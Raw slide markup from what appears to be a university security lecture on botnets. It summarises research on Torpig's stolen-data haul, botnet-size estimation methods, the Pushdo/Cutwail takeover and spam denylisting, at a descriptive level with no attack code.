              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> - 1]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="123407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3"/>
            <a:ext cx="10515600" cy="1052828"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stolen Information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1709059" y="1144073"/>
            <a:ext cx="8839200" cy="779129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data gathered from Jan 25-Feb 4, 2009</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2697153" y="1764486"/>
            <a:ext cx="2006127" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>User Accounts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7120667" y="1764486"/>
            <a:ext cx="2055819" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Bank Accounts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Content Placeholder 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1709059" y="5288953"/>
            <a:ext cx="9533564" cy="1492845"/>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ClrTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How much is this data worth?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClrTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Credit cards: $0.10-$25 each, banks accounts: $10-$1000 each</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClrTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Estimated total: $83K-$8.3M</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484" y="2107730"/>
            <a:ext cx="4080367" cy="303829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060" y="2152699"/>
            <a:ext cx="4286227" cy="2978331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="335381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4ECA-3A02-4C8F-94C3-4DCE98F409A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spam Campaigns</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F15F128A-F56E-4A34-A7E5-EC941E5042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450" y="1882853"/>
            <a:ext cx="11860077" cy="3748845"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98083EF2-D801-4D8D-9B5E-42B261C5A684}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2500688" y="6154511"/>
            <a:ext cx="7190623" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Observed during takeover of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Pushdo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Cutwail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> botnet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1199131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024128" y="965199"/>
            <a:ext cx="6766078" cy="4927601"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Crimeware</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8438729" y="965198"/>
            <a:ext cx="2707937" cy="4927602"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Malware, Spyware, Adware, Ransomware, Trojans, RATs, Bots…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Connector 11">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976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Estimate Botnet Size?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Passive data collection methodologies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Honeypots</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Infect your own machines with Trojans</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Observe network traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Look at DNS traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Domains linked to fast flux C&amp;C</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Networks flows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Analyze all packets from a large ISP and use heuristics to identify botnet traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>None</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> of these methods give a complete picture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17940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animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8"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063"/>
            <a:ext cx="10515600" cy="909895"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Size of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Torpig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Botnet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="359764" y="5564981"/>
            <a:ext cx="11167672" cy="1135857"/>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ClrTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why the disconnect between IPs and bots?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClrTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dynamic IPs, short DHCP leases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764" y="1132842"/>
            <a:ext cx="11476539" cy="4152800"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7801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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="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C258-46CB-424B-85C3-0DAAC75FB6DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Botmaster’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Perspective of Coordinating Large-Scale Spam Campaigns”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{692099BB-4E2C-4B0A-80D0-8763EDE71D9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2271713"/>
            <a:ext cx="10515600" cy="4407692"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Takeover of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Pushdo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Cutwail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> botnet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First appeared in 2007</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Almost exclusively used for spam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Failed past takeovers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>McColo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in 2008</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3FN in 2009</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Fireeye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in 2010</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used dynamic analysis to identify the IPs of C&amp;C servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Shut down 20, took over 16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Covers ½ to 2/3 of all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Cutwail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> C&amp;C servers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14064966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114B0-02A1-4A41-A9EE-8EB8F357B4C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Size</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3CA127A-B151-49E1-BB3A-D47D03948D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593" y="1905376"/>
            <a:ext cx="11474814" cy="3918344"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B9298CC-147F-4905-A258-A7AAE17A781A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2450412" y="1690688"/>
            <a:ext cx="1290994" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Per Hour</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A0E3019-CBC4-4660-9032-6B285D60D810}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8872983" y="1690688"/>
            <a:ext cx="1137812" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Per Day</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3905619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0F9E-35D2-4DAC-BE8E-77E96F93D2FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Denylisting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67893C78-FCC1-4184-9256-673234096D9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Denylisting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a common technique to filter spam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IPs of machines sending spam are recorded and distributed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Email providers filter emails from these IPs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Spamhaus</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Cutwail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> bots queried their own </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>denylist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> status periodically!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SORBS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SpamCop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, DNSBL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reported their status to the C&amp;C</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C&amp;C would divert spam to other “clean” bots</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="345208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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="1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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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8432-022B-4735-A4EB-5A01F147DCE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Time to Blacklist</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8416A4AC-9603-4C05-B6EC-7D2806AC46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43642"/>
            <a:ext cx="5749516" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Table 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D27C190-9D83-40D9-8D77-043700572165}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="719079413"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7076966" y="2683599"/>
          <a:ext cx="4328260" cy="2286000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2364327">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2611918633"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1963933">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4262100249"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Time Since Spam Campaign Started</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
